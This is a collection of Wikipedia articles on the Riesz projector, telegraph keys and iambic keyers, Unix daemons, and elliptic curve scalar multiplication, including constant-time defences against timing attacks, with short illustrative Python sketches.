Ifλ∈σ(A){\displaystyle \lambda \in \sigma (A)}is the only point of the spectrum ofA{\displaystyle A}inGΓ{\displaystyle G_{\Gamma }}, thenPΓ{\displaystyle P_{\Gamma }}is denoted byPλ{\displaystyle P_{\lambda }}.
The operatorPΓ{\displaystyle P_{\Gamma }}is a projector which commutes withA{\displaystyle A}, and hence in the decomposition
both termsLΓ{\displaystyle {\mathfrak {L}}_{\Gamma }}andNΓ{\displaystyle {\mathfrak {N}}_{\Gamma }}areinvariant subspacesof the operatorA{\displaystyle A}.
Moreover,
If Γ₁ and Γ₂ are two different contours having the properties indicated above, and the regions G_{Γ₁} and G_{Γ₂} have no points in common, then the projectors corresponding to them are mutually orthogonal:
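A small numerical sketch can make the definition concrete. The matrix, contour, and node count below are assumed for illustration: the projector P = (1/2πi) ∮_Γ (zI − A)⁻¹ dz is approximated by the trapezoidal rule on a circle enclosing only the eigenvalue of interest (on a circle, the trapezoidal rule converges very rapidly for analytic integrands):

```python
import cmath
import math

def solve(M, b):
    # Gaussian elimination with partial pivoting for a complex linear system
    n = len(M)
    A = [list(M[i]) + [b[i]] for i in range(n)]
    for c in range(n):
        p = max(range(c, n), key=lambda r: abs(A[r][c]))
        A[c], A[p] = A[p], A[c]
        for r in range(c + 1, n):
            f = A[r][c] / A[c][c]
            for k in range(c, n + 1):
                A[r][k] -= f * A[c][k]
    x = [0j] * n
    for r in range(n - 1, -1, -1):
        x[r] = (A[r][n] - sum(A[r][k] * x[k] for k in range(r + 1, n))) / A[r][r]
    return x

def riesz_projector(A, center, radius, nodes=256):
    # P = (1/(2*pi*i)) * contour integral of (zI - A)^(-1) dz over a circle
    # of the given center and radius, discretized with the trapezoidal rule
    n = len(A)
    P = [[0j] * n for _ in range(n)]
    for j in range(nodes):
        t = 2 * math.pi * j / nodes
        w = cmath.exp(1j * t)
        z = center + radius * w
        dz = radius * 1j * w * (2 * math.pi / nodes)
        M = [[(z if r == c else 0) - A[r][c] for c in range(n)] for r in range(n)]
        for c in range(n):
            e = [1.0 if r == c else 0.0 for r in range(n)]
            col = solve(M, e)  # column c of the resolvent (zI - A)^(-1)
            for r in range(n):
                P[r][c] += col[r] * dz / (2j * math.pi)
    return P
```

For a matrix with a Jordan block at 2 and a second eigenvalue at 5, a unit circle around 2 yields (numerically) the projector onto the two-dimensional invariant subspace: P² = P, AP = PA, and trace P equals the number of enclosed eigenvalues, counting multiplicity.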
|
https://en.wikipedia.org/wiki/Riesz_projector
|
A telegraph key, clacker, tapper, or Morse key is a specialized electrical switch used by a trained operator to transmit text messages in Morse code in a telegraphy system.[1] Keys are used in all forms of electrical telegraph systems, including landline (also called wire) telegraphy and radio (also called wireless) telegraphy. An operator uses the telegraph key to send electrical pulses (or in the case of modern CW, unmodulated radio waves) of two different lengths: short pulses, called dots or dits, and longer pulses, called dashes or dahs. These pulses encode the letters and other characters that spell out the message.
The first telegraph key was invented byAlfred Vail, an associate ofSamuel Morse.[2]Since then the technology has evolved and improved, resulting in a range of key designs.[3]
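The dot/dash encoding can be illustrated with a minimal sketch; the dictionary below is only a small assumed subset of the International Morse table:

```python
# Partial International Morse Code table: "." is a dit, "-" is a dah.
MORSE = {
    "A": ".-", "C": "-.-.", "E": ".", "O": "---",
    "S": "...", "T": "-",
}

def encode(text):
    # Each letter becomes a dit/dah group; groups are separated by spaces.
    return " ".join(MORSE[ch] for ch in text.upper())
```

For example, the distress signal SOS encodes as "... --- ...".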
A straight key is the common telegraph key as seen in various movies. It is a simple bar with a knob on top and an electrical contact underneath. When the bar is pressed down against spring tension, it makes a closed electric circuit.[4] Traditionally, American telegraph keys had flat-topped knobs and narrow bars (frequently curved), while European telegraph keys had ball-shaped knobs and thick bars. This appears to be purely a matter of culture and training, but the users of each are tremendously partisan.[a]
Straight keys have been made in numerous variations for over 150 years and in numerous countries. They are the subject of an avid community of key collectors. The straight keys also had ashorting barthat closed the electrical circuit through the station when the operator was not actively sending messages. The shorting switch for an unused key was needed in telegraph systems wired in the style of North American railroads, in which the signal power was supplied from batteries only in telegraph offices at one or both ends of a line, rather than each station having its own bank of batteries, which was often used in Europe. The shorting bar completed the electrical path to the next station and all following stations, so that their sounders could respond to signals coming down the line, allowing the operator in the next town to receive a message from the central office. Although occasionally included in later keys for reasons of tradition, the shorting bar is unnecessary for radio telegraphy, except as a convenience to produce a steady signal for tuning the transmitter.
The straight key is simple and reliable, but the rapid pumping action needed to send a string of dots (orditsas most operators call them) poses some medically significant drawbacks.
Transmission speeds vary from 5 words (25 characters) per minute, by novice operators, up to about 30 words (150 characters) per minute by skilled operators. In the early days of telegraphy, a number of professional telegraphers developed a repetitive stress injury known as glass arm or telegraphers' paralysis.[5] "Glass arm" may be reduced or eliminated by increasing the side play of the straight key, by loosening the adjustable trunnion screws. Such problems can be avoided either by using good manual technique, or by only using side-to-side key types.[6][7][8]
In addition to the basic up-and-down telegraph key, telegraphers have been experimenting with alternate key designs from the beginning of telegraphy. Many are made to move side-to-side instead of up-and-down. Some of the designs, such assideswipers(orbushwhackers) andsemi-automatickeys operate mechanically.
Beginning in the mid-20th century electronic devices calledkeyershave been developed, which are operated by special keys of various designs generally categorized assingle-paddlekeys (also calledsideswipers), anddouble-paddlekeys (or "iambic"[b]or "squeeze" keys). The keyer may be either an independent device that attaches to the transmitter in place of a telegraph key, or circuitry incorporated in modern amateurs' radios.
The first widely accepted alternative key was the sideswiper or sidewinder, sometimes called a cootie key or bushwhacker. This key uses a side-to-side action with contacts on both the left and right, and the arm spring-loaded to return to center; the operator may make a dit or a dah by swinging the lever in either direction. A series of dits can be sent by rocking the arm back and forth.
This first new style of key was introduced in part to increase speed of sending, but more importantly to reduce therepetitive strain injurywhich telegraphers called "glass arm". The side-to-side motion reduces strain, and uses different muscles than the up-and-down motion (called "pounding brass"). Nearly all advanced keys use some form of side-to-side action.
The alternating action produces a distinctive rhythm orswingwhich noticeably affects the operator's transmission rhythm (known asfist). Although the original sideswiper is now rarely seen or used, when the left and right contacts are electrically separated a sideswiper becomes a modern single-paddle key (see below); likewise, a modern single-lever key becomes an old-style sideswiper when its two contacts are wired together.
A popular side-to-side key is the semi-automatic key or "bug", sometimes known as aVibroplexkey after an early manufacturer of mechanical, semi-automatic keys. The original bugs were fully mechanical, based on a kind of simple clockwork mechanism, and required no electronic keyer. A skilled operator can achieve sending speeds in excess of 40 words per minute with a bug.
The benefit of the clockwork mechanism is that it reduces the motion required from the telegrapher's hand, which provides greater speed of sending, and it produces uniformly timeddits(dots, or short pulses) and maintains constant rhythm; consistent timing and rhythm are crucial for decoding the signal on the other end of the telegraph line.
The single paddle is held between the knuckle and the thumb of the right hand. When the paddle is pressed to the right (with the thumb), it kicks a horizontalpendulumwhich then rocks against the contact point, sending a series of short pulses (ditsor dots) at a speed which is controlled by the pendulum’s length. When the paddle is pressed toward the left (with the knuckle) it makes a continuous contact suitable for sendingdahs(dashes); the telegrapher remains responsible for timing thedahsto proportionally match thedits. The clockwork pendulum needs the extra kick that the stronger thumb press provides, which established the standard left-right paddle directions for thedit-dahassignments that persists on the paddles on 21st century electronic keys. A few semi-automatic keys were made with mirror-image mechanisms for left-handed telegraphers.
Like semi-automatic keys, the telegrapher operates anelectronic keyerby tapping a paddle key, swinging its lever(s) from side-to-side. When pressed to one side (usually left), the keyer electronics generate a series ofdahs; when pressed to the other side (usually right), a series ofdits. Keyers work with two different types of keys: Single paddle and double paddle keys.
Like semi-automatic keys, pressing the paddle on one side produces aditand the other adah. Single paddle keys are also calledsingle lever keysorsideswipers, the same name as the older side-to-side key design they greatly resemble. Double paddle keys are also called "iambic" keys[b]or "squeeze" keys. Also like the old semi-automatic keys, the conventional assignment of the paddle directions (for a right-handed telegrapher) is that pressing a paddle with the right thumb (pressing the single paddle rightward, or for a double-paddle key, pressing the left paddle with the thumb, rightwards towards the center) creates a series ofdits. Pressing a paddle with the right knuckle (hence swinging a single paddle leftward, or the right paddle on a double-paddle key leftward to the center) creates a series ofdahs. Left-handed telegraphers sometimes elect to reverse the electrical contacts, so their left-handed keying is a mirror image of standard right-handed keying.
Single paddle keys are essentially the same as the original sideswiper keys, with the left and right electrical contacts wired separately. Double-paddle keys have one arm for each of the two contacts, each arm held away from the common center by a spring; pressing either of the paddles towards the center makes contact, the same as pressing a single-lever key to one side. For double-paddle keys wired to an "iambic" keyer, squeezing both paddles together makes a double-contact, which causes the keyer to send alternatingditsanddahs(ordahsanddits, depending on which lever makes first contact).
Mostelectronic keyersincludedot and dash memoryfunctions, so the operator does not need to use perfect spacing betweenditsanddahsor vice versa. Withditordahmemory, the operator's keying action can be about oneditahead of the actual transmission. The electronics in the keyer adjusts the timing so that the output of each letter is machine-perfect. Electronic keyers allow very high speed transmission of code.
Using akeyerin "iambic" mode requires a key with two paddles: One paddle producesdits and the other producesdahs. Pressing both at the same time (a "squeeze") produces an alternatingdit-dah-dit-dah(▄ ▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄) sequence, which starts with aditif theditside makes contact first, or adah(▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄ ▄) if thedahside connects first.
An additional advantage of electronic keyers over semiautomatic keys is that code speed is easily changed with electronic keyers, just by turning a knob. With a semiautomatic key, the location of the pendulum weight and the pendulum spring tension and contact must all be repositioned and rebalanced to change theditspeed.[9]
Keys having two separate levers, one forditsand the other fordahsare called dual or dual-lever paddles. With a dual paddle both contacts may be closed simultaneously, enabling the "iambic"[b]functions of an electronic keyer that is designed to support them: By pressing both paddles (squeezing the levers together) the operator can create a series of alternatingditsanddahs, analogous to a sequence ofiambs in poetry.[10][11]For that reason, dual paddles are sometimes calledsqueeze keysoriambic keys. Typical dual-paddle keys' levers move horizontally, like the earlier single-paddle keys, as opposed to how the original "straight-keys'" arms move up-and-down.
Whether the sequence begins with aditor adahis determined by which lever makes contact first: If thedahlever is closed first, then the first element will be adah, so the string of elements will be similar to a sequence oftrocheesin poetry, and the method could logically just as well be called"trochaic keying"(▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄). If theditlever makes first contact, then the string begins with adit(▄ ▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄ ▄).
Insofar as iambic[b]keying is a function of the electronic keyer, it is not correct, technically, to refer to a dual paddle keyitselfas "iambic", although this is commonly done in marketing. A dual paddle key is required for iambic sending, which also requires an iambic keyer. But any single- or dual-paddle key can be used non-iambicly, without squeezing, and there were electronic keyers made which did not have iambic functions.
Iambic keying or squeeze keying reduces the key strokes or hand movements necessary to make some characters, e.g. the letter C, which can be sent by merely squeezing the two paddles together. With a single-paddle or non-iambic keyer, the hand motion would require alternating four times forC(dah-dit-dah-dit▄▄▄ ▄ ▄▄▄ ▄).
The efficiency of iambic keying has recently been discussed in terms of movements per character and timings for high speed CW, with the author concluding that the timing difficulties of correctly operating a keyer iambicly at high speed outweigh any small benefits.[12]
Iambic keyers function in one of at least two major modes: ModeAand modeB. There is a third, rarely available modeU.
ModeAis the original iambic mode, in which alternate dots and dashes are produced as long as both paddles are depressed. ModeAis essentially "what you hear is what you get": When the paddles are released, the keying stops with the last dot or dash that was being sent while the paddles were held.
ModeBis the second mode, which devolved from a logic error in an early iambic keyer.[citation needed]Over the years iambic modeBhas become something of a standard and is the default setting in most keyers.
In modeB, dots and dashes are produced as long as both paddles are depressed. When the paddles are released, the keying continues by sendingone more elementthan has already been heard. I.e., if the paddles were released during adahthen the last element sent will be a followingdit; if the paddles were released during aditthen the sequence will end with the followingdah.
Users accustomed to one mode may find it difficult to adapt to the other, so most modern keyers allow selection of the desired mode.
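The A/B release rule can be sketched as a toy model; this deliberately ignores real keyers' element timing, weighting, and dot/dash memories, and only illustrates what happens when a squeeze is released:

```python
def iambic_squeeze(first, held, mode):
    """Toy model of an iambic keyer during a squeeze (both paddles closed).

    `first` is the side that made contact first ("dit" or "dah"); `held` is
    the number of alternating elements (>= 1) that play before the paddles
    are released. Mode "A" stops with the element in progress at release;
    mode "B" sends one extra (opposite) element after release.
    """
    other = {"dit": "dah", "dah": "dit"}
    seq = [first if i % 2 == 0 else other[first] for i in range(held)]
    if mode == "B":
        seq.append(other[seq[-1]])
    return seq
```

So a squeeze starting on the dah side and released after four elements yields dah-dit-dah-dit in mode A, but dah-dit-dah-dit-dah in mode B.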
A third electronic keyer mode useful with a dual paddle is the "Ultimatic" mode (modeU), so-called for the brand name of the electronic keyer that introduced it. In the Ultimatic keying mode, the keyer will switch to the opposite element if the second lever is pressed before the first is released (that is, squeezed).
A single-lever paddle key has separate contacts forditsanddahs, but there is no ability to make both contacts simultaneously by squeezing the paddles together for iambic mode.
When a single-paddle key is used with an electronic keyer, continuousditsare created by holding thedit-side paddle (▄ ▄ ▄ ▄ ▄ ▄ ▄ ▄...); likewise, continuousdahsare created by holding thedahpaddle (▄▄▄ ▄▄▄ ▄▄▄ ▄▄▄ ▄▄▄...).
A single-paddle key can operate any electronic keyer non-iambically, whether or not the keyer even offers iambic functions, and regardless of whether the keyer operates iambically in mode A, B, or U.
Simple telegraph-like keys were long used to control the flow of electricity in laboratory tests of electrical circuits. Often, these were simple "strap" keys, in which a bend in the key lever provided the key's spring action.
Telegraph-like keys were once used in the study of operant conditioning with pigeons. Starting in the 1940s, initiated by B. F. Skinner at Harvard University, the keys were mounted vertically behind a small circular hole, about the height of a pigeon's beak, in the front wall of an operant conditioning chamber. Electromechanical recording equipment detected the closing of the switch whenever the pigeon pecked the key. Depending on the psychological questions being investigated, keypecks might have resulted in the presentation of food or other stimuli.
With straight keys, side-swipers, and, to an extent, bugs, each and every telegrapher has their own unique style or rhythm pattern when transmitting a message. An operator's style is known as their "fist".
Since every fist is unique, other telegraphers can usually identify the individual telegrapher transmitting a particular message. This had huge significance during the First and Second World Wars, since an on-board telegrapher's fist could be used to track individual ships and submarines, and for traffic analysis.
However, with electronic keyers (either single- or double-paddle) this is no longer the case: Keyers produce uniformly "perfect" code at a set speed, which is altered at the request of the receiver, usually not the sender. Only inter-character and inter-word spacing remain unique to the operator, and can produce a less clear semblance of a fist.
|
https://en.wikipedia.org/wiki/Telegraph_key
|
In multitasking computer operating systems, a daemon (/ˈdiːmən/ or /ˈdeɪmən/)[1] is a computer program that runs as a background process, rather than being under the direct control of an interactive user. Traditionally, the process name of a daemon ends with the letter d, to clarify that the process is in fact a daemon and to differentiate a daemon from a normal computer program. For example, syslogd is a daemon that implements the system logging facility, and sshd is a daemon that serves incoming SSH connections.
In a Unix environment, the parent process of a daemon is often, but not always, the init process. A daemon is usually created either by a process forking a child process and then immediately exiting, thus causing init to adopt the child process, or by the init process directly launching the daemon. In addition, a daemon launched by forking and exiting typically must perform other operations, such as dissociating the process from any controlling terminal (tty). Such procedures are often implemented in various convenience routines such as daemon(3) in Unix.
Systems often start daemons at boot time that will respond to network requests, hardware activity, or other programs by performing some task. Daemons such as cron may also perform defined tasks at scheduled times.
The term was coined by the programmers at MIT's Project MAC. According to Fernando J. Corbató, who worked on Project MAC around 1963, his team was the first to use the term daemon, inspired by Maxwell's demon, an imaginary agent in physics and thermodynamics that helped to sort molecules, stating, "We fancifully began to use the word daemon to describe background processes that worked tirelessly to perform system chores".[2] Unix systems inherited this terminology. Maxwell's demon is consistent with Greek mythology's interpretation of a daemon as a supernatural being working in the background.
In the general sense, daemon is an older form of the word "demon", from the Greek δαίμων. In the Unix System Administration Handbook, Evi Nemeth states the following about daemons:[3]
Many people equate the word "daemon" with the word "demon", implying some kind of satanic connection between UNIX and the underworld. This is an egregious misunderstanding. "Daemon" is actually a much older form of "demon"; daemons have no particular bias towards good or evil, but rather serve to help define a person's character or personality. The ancient Greeks' concept of a "personal daemon" was similar to the modern concept of a "guardian angel"; eudaemonia is the state of being helped or protected by a kindly spirit. As a rule, UNIX systems seem to be infested with both daemons and demons.
In modern usage in the context of computer software, the word daemon is pronounced /ˈdiːmən/ DEE-mən or /ˈdeɪmən/ DAY-mən.[1]
Alternative terms for daemon are service (used in Windows, from Windows NT onwards, and later also in Linux), started task (IBM z/OS),[4] and ghost job (XDS UTS). Sometimes the more general term server or server process is used, particularly for daemons that operate as part of client-server systems.[5]
After the term was adopted for computer use, it was rationalized as a backronym for Disk And Execution MONitor.[6][1]
Daemons that connect to a computer network are examples of network services.
In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned the init process (process number 1) as its parent process and has no controlling terminal. However, more generally, a daemon may be any background process, whether a child of the init process or not.
On a Unix-like system, the common method for a process to become a daemon, when the process is started from the command line or from a startup script such as an init script or a SystemStarter script, involves a sequence of steps such as forking, creating a new session to dissociate from the controlling terminal, and redirecting the standard streams.
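The classic double-fork procedure described above can be sketched as follows. This is a minimal, simplified illustration (the function name `daemonize` is illustrative), not a substitute for the system's daemon(3) routine:

```python
import os
import sys

def daemonize():
    """Minimal sketch of the classic Unix double-fork daemonization."""
    if os.fork() > 0:   # first fork: parent exits, child is adopted by init
        sys.exit(0)
    os.setsid()         # new session: dissociate from the controlling tty
    if os.fork() > 0:   # second fork: the daemon can never reacquire a tty
        sys.exit(0)
    os.chdir("/")       # avoid holding any mount point busy
    os.umask(0)
    # redirect the standard streams to /dev/null
    devnull = os.open(os.devnull, os.O_RDWR)
    for fd in (0, 1, 2):
        os.dup2(devnull, fd)
```

A real daemon would also close inherited file descriptors and handle signals; super-servers such as systemd make most of these steps unnecessary.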
If the process is started by a super-server daemon, such as inetd, launchd, or systemd, the super-server daemon will perform those functions for the process,[7][8][9] except for old-style daemons not converted to run under systemd and specified as Type=forking[9] and "multi-threaded" datagram servers under inetd.[7]
In the Microsoft DOS environment, daemon-like programs were implemented as terminate-and-stay-resident programs (TSR).
On Microsoft Windows NT systems, programs called Windows services perform the functions of daemons. They run as processes, usually do not interact with the monitor, keyboard, and mouse, and may be launched by the operating system at boot time. In Windows 2000 and later versions, Windows services are configured and manually started and stopped using the Control Panel, a dedicated control/configuration program, the Service Controller component of the Service Control Manager (sc command), the net start and net stop commands, or the PowerShell scripting system.
However, any Windows application can perform the role of a daemon, not just a service, and some Windows daemons have the option of running as a normal process.
On the classic Mac OS, optional features and services were provided by files loaded at startup time that patched the operating system; these were known as system extensions and control panels. Later versions of classic Mac OS augmented these with fully fledged faceless background applications: regular applications that ran in the background. To the user, these were still described as regular system extensions.
macOS, which is a Unix system, uses daemons, but uses the term "services" to designate software that performs functions selected from the Services menu, rather than using that term for daemons, as Windows does.
|
https://en.wikipedia.org/wiki/Daemon_(computer_software)
|
Elliptic curve scalar multiplication is the operation of successively adding a point along an elliptic curve to itself. It is used in elliptic curve cryptography (ECC).
The literature presents this operation as scalar multiplication, as written in Hessian form of an elliptic curve. A widespread name for this operation is also elliptic curve point multiplication, but this can convey the wrong impression of being a multiplication between two points.
Given a curve, E, defined by some equation in a finite field (such as E: y² = x³ + ax + b), point multiplication is defined as the repeated addition of a point along that curve. Denote nP = P + P + P + … + P for some scalar (integer) n and a point P = (x, y) that lies on the curve E. This type of curve is known as a Weierstrass curve.
The security of modern ECC depends on the intractability of determining n from Q = nP given known values of Q and P if n is large (known as the elliptic curve discrete logarithm problem, by analogy to other cryptographic systems). This is because the addition of two points on an elliptic curve (or the addition of one point to itself) yields a third point on the elliptic curve whose location has no immediately obvious relationship to the locations of the first two, and repeating this many times over yields a point nP that may be essentially anywhere. Intuitively, this is not dissimilar to the fact that if you had a point P on a circle, adding 42.57 degrees to its angle may still give a point "not too far" from P, but adding 1000 or 1001 times 42.57 degrees will yield a point that requires a bit more complex calculation to find the original angle. Reversing this process, i.e., given Q = nP and P, determining n, can only be done by trying out all possible n, an effort that is computationally intractable if n is large.
There are three commonly defined operations for elliptic curve points: addition, doubling and negation.
The point at infinity O is the identity element of elliptic curve arithmetic. Adding it to any point results in that other point, including adding the point at infinity to itself.
That is:
The point at infinity is also written as 0.
Point negation is finding a point such that adding it to the original point results in the point at infinity (O).
For elliptic curves of the form E: y² = x³ + ax + b, the negation of a point is the point with the same x coordinate but negated y coordinate:
With 2 distinct points, P and Q, addition is defined as the negation of the point resulting from the intersection of the curve, E, and the straight line defined by the points P and Q, giving the point, R.[1]
Assuming the elliptic curve, E, is given by y² = x³ + ax + b, this can be calculated as: λ = (y_Q − y_P)/(x_Q − x_P), x_R = λ² − x_P − x_Q, y_R = λ(x_P − x_R) − y_P.
These equations are correct when neither point is the point at infinity, O, and the points have different x coordinates (they are not mutual inverses). This is important for the ECDSA verification algorithm where the hash value could be zero.
Where the points P and Q are coincident (at the same coordinates), addition is similar, except that there is no well-defined straight line through P, so the operation is closed using a limiting case, the tangent to the curve, E, at P.
This is calculated as above, but with the tangent slope obtained from the derivatives (dE/dx)/(dE/dy), giving λ = (3x_P² + a)/(2y_P),[1]
where a is from the defining equation of the curve, E, above.
The straightforward way of computing a point multiplication is through repeated addition. However, there are more efficient approaches to computing the multiplication.
The simplest method is the double-and-add method,[2] similar to square-and-multiply in modular exponentiation. The algorithm works as follows:
To compute sP, start with the binary representation for s: s = s_0 + 2s_1 + 2²s_2 + ⋯ + 2^(n−1)s_(n−1), where s_0, …, s_(n−1) ∈ {0, 1} and n = ⌈log₂ s⌉.
Note that both of the iterative methods above are vulnerable to timing analysis. See Montgomery Ladder below for an alternative approach.
where f is the function for multiplying, P is the point to multiply, and d is the number of times to add the point to itself. Example: 100P can be written as 2(2[P + 2(2[2(P + 2P)])]) and thus requires six point doubling operations and two point addition operations. 100P would be equal to f(P, 100).
This algorithm requires log₂(d) iterations of point doubling and addition to compute the full point multiplication. There are many variations of this algorithm, such as using a window, sliding window, NAF, NAF-w, vector chains, and the Montgomery ladder.
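A minimal sketch of double-and-add, using a small toy curve over GF(17) chosen purely for illustration (real ECC uses standardized curves over much larger fields; the curve parameters and helper names here are assumptions of the sketch):

```python
# Toy curve y^2 = x^3 + a*x + b over GF(p); parameters are illustrative only.
p, a, b = 17, 2, 2
O = None  # the point at infinity, the identity element

def add(P, Q):
    """Add two curve points; handles the identity, doubling, and inverses."""
    if P is O: return Q
    if Q is O: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return O                                          # P + (-P) = O
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p  # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p         # chord slope
    x3 = (lam * lam - x1 - x2) % p
    y3 = (lam * (x1 - x3) - y1) % p
    return (x3, y3)

def double_and_add(n, P):
    """Compute nP by scanning the bits of n from the most significant down."""
    R = O
    for bit in bin(n)[2:]:
        R = add(R, R)          # always double
        if bit == "1":
            R = add(R, P)      # add P when the bit is set
    return R
```

The result agrees with naive repeated addition while using only about log₂(n) doublings plus one addition per set bit.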
In the windowed version of this algorithm,[2] one selects a window size w and computes all 2^w values of dP for d = 0, 1, 2, …, 2^w − 1. The algorithm now uses the representation d = d_0 + 2^w d_1 + 2^(2w) d_2 + ⋯ + 2^(mw) d_m and becomes
This algorithm has the same complexity as the double-and-add approach with the benefit of using fewer point additions (which in practice are slower than doublings). Typically, the value of w is chosen to be fairly small, making the pre-computation stage a trivial component of the algorithm. For the NIST recommended curves, w = 4 is usually the best selection. The entire complexity for an n-bit number is measured as n + 1 point doubles and 2^w − 2 + n/w point additions.
In the sliding-window version, we look to trade off point additions for point doubles. We compute a similar table as in the windowed version, except we only compute the points dP for d = 2^(w−1), 2^(w−1) + 1, …, 2^w − 1. Effectively, we only compute the values for which the most significant bit of the window is set. The algorithm then uses the original double-and-add representation of d = d_0 + 2d_1 + 2²d_2 + ⋯ + 2^m d_m.
This algorithm has the benefit that the pre-computation stage is roughly half as complex as the normal windowed method, while also trading slower point additions for point doublings. In effect, there is little reason to use the windowed method over this approach, except that the former can be implemented in constant time. The algorithm requires w − 1 + n point doubles and at most 2^(w−1) − 1 + n/w point additions.
In the non-adjacent form we aim to make use of the fact that point subtraction is just as easy as point addition, in order to perform fewer of either compared to a sliding-window method. The NAF of the multiplicand d must be computed first with the following algorithm,
where the signed modulo function mods is defined as
This produces the NAF needed to perform the multiplication. This algorithm requires the pre-computation of the points {1, 3, 5, …, 2^(w−1) − 1}P and their negatives, where P is the point to be multiplied. On typical Weierstrass curves, if P = {x, y} then −P = {x, −y}, so in essence the negatives are cheap to compute. Next, the following algorithm computes the multiplication dP:
The wNAF guarantees that on average there will be a density of 1/(w + 1) point additions (slightly better than the unsigned window). It requires 1 point doubling and 2^(w−2) − 1 point additions for precomputation. The algorithm then requires n point doublings and n/(w + 1) point additions for the rest of the multiplication.
One property of the NAF is that we are guaranteed that every non-zero element d_i is followed by at least w − 1 additional zeroes. This is because the algorithm clears out the lower w bits of d with every subtraction of the output of the mods function. This observation can be used for several purposes. After every non-zero element the additional zeroes can be implied and do not need to be stored. Secondly, the multiple serial divisions by 2 can be replaced by a single division by 2^w after every non-zero d_i element, and a division by 2 after every zero.
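The mods-based digit extraction described above can be sketched as follows (a hedged Python sketch; the function name `wnaf` is illustrative):

```python
def wnaf(d, w=2):
    """Width-w NAF of d, least-significant digit first.

    Each digit is zero or odd with absolute value below 2^(w-1); every
    non-zero digit is followed by at least w-1 zeros."""
    digits = []
    while d > 0:
        if d % 2 == 1:
            di = d % (1 << w)            # d mod 2^w
            if di >= (1 << (w - 1)):     # the signed residue "mods"
                di -= (1 << w)
            d -= di                      # clears the low w bits of d
        else:
            di = 0
        digits.append(di)
        d //= 2
    return digits
```

For example, wnaf(7) yields digits representing 7 = −1 + 2³, replacing the three consecutive set bits of binary 111 with two non-zero signed digits.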
It has been shown that through application of a FLUSH+RELOAD side-channel attack on OpenSSL, the full private key can be revealed after cache-timing observations of as few as 200 signatures.[3]
The Montgomery ladder[4] approach computes the point multiplication in a fixed number of operations. This can be beneficial when timing, power consumption, or branch measurements are exposed to an attacker performing a side-channel attack. The algorithm uses the same representation as double-and-add.
This algorithm has in effect the same speed as the double-and-add approach, except that it computes the same number of point additions and doublings regardless of the value of the multiplicand d. This means that at this level the algorithm does not leak any information through branches or power consumption.
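The uniform one-add-one-double pattern per bit can be sketched as follows. This is an illustrative Python sketch on a toy curve over GF(17) (curve, point, and helper names are assumptions); note that this high-level version demonstrates only the uniform operation count, not genuinely constant-time execution, since Python still branches on the secret bit:

```python
# Toy curve y^2 = x^3 + 2x + 2 over GF(17); illustrative only.
p, a = 17, 2
O = None  # point at infinity

def add(P, Q):
    if P is O: return Q
    if Q is O: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return O
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def ladder(d, P):
    """Montgomery-ladder pattern: one add and one double per bit of d.

    Invariant: R1 - R0 == P at every step, so R0 ends up equal to dP."""
    R0, R1 = O, P
    for bit in bin(d)[2:]:
        if bit == "0":
            R1 = add(R0, R1)   # R1 <- R0 + R1
            R0 = add(R0, R0)   # R0 <- 2*R0
        else:
            R0 = add(R0, R1)   # R0 <- R0 + R1
            R1 = add(R1, R1)   # R1 <- 2*R1
    return R0
```

Both branches perform exactly one addition and one doubling, which is what makes the ladder's operation sequence independent of d.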
However, it has been shown that through application of a FLUSH+RELOAD side-channel attack on OpenSSL, the full private key can be revealed after performing cache-timing against only one signature at a very low cost.[5]
Rust code for the Montgomery ladder is given in.[6]
The security of a cryptographic implementation is likely to face the threat of so-called timing attacks, which exploit the data-dependent timing characteristics of the implementation. Machines running cryptographic implementations consume variable amounts of time to process different inputs, and so the timings vary based on the encryption key. To resolve this issue, cryptographic algorithms are implemented in a way which removes the data-dependent variable timing characteristics from the implementation, leading to so-called constant-time implementations. A software implementation is considered to be constant-time in the following sense, as stated in:[7] it "avoids all input-dependent branches, all input-dependent array indices, and other instructions with input-dependent timings." The GitHub page[8] lists coding rules for implementations of cryptographic operations, and more generally for operations involving secret or sensitive values.
The Montgomery ladder is an x-coordinate-only algorithm for elliptic curve point multiplication and is based on the double and add rules over a specific set of curves known as Montgomery curves. The algorithm has a conditional branch whose condition depends on a secret bit, so a straightforward implementation of the ladder will not be constant time and has the potential to leak the secret bit. This problem has been addressed in the literature,[9][10] and several constant-time implementations are known. The constant-time Montgomery ladder algorithm is given below; it uses two functions, CSwap and Ladder-Step. In the return value of the algorithm, Z2^(p−2) is the value of Z2⁻¹ computed using Fermat's little theorem.
The Ladder-Step function (given below) used within the ladder is the core of the algorithm and is a combined form of the differential add and doubling operations. The field constant a24 is defined as a24 = (A + 2)/4, where A is a parameter of the underlying Montgomery curve.
The CSwap function manages the conditional branching and helps the ladder to run following the requirements of a constant-time implementation. The function swaps the pair of field elements ⟨X2, Z2⟩ and ⟨X3, Z3⟩ only if b = 1, and this is done without leaking any information about the secret bit. Various methods of implementing CSwap have been proposed in the literature.[9][10] A less costly option to meet the constant-time requirement of the Montgomery ladder is conditional select, which is formalised through a function CSelect. This function has been used in various optimisations and has been formally discussed in.[11]
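The branch-free idea behind CSwap can be sketched arithmetically: a mask derived from the secret bit drives identical operations in both cases. This is a simplified single-word sketch (real implementations apply it limb-by-limb to fixed-width field elements; the names are illustrative):

```python
MASK64 = (1 << 64) - 1

def cswap(b, x, y):
    """Branch-free conditional swap of two 64-bit words: swaps iff b == 1."""
    mask = (-b) & MASK64   # b=1 -> all-ones mask, b=0 -> all-zeros mask
    t = (x ^ y) & mask     # t is x^y when swapping, 0 otherwise
    return x ^ t, y ^ t    # same instruction sequence for either value of b
```

Because the same XOR/AND sequence executes whether b is 0 or 1, the running time does not depend on the secret bit (in compiled code; a constant-time guarantee also depends on the compiler and hardware).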
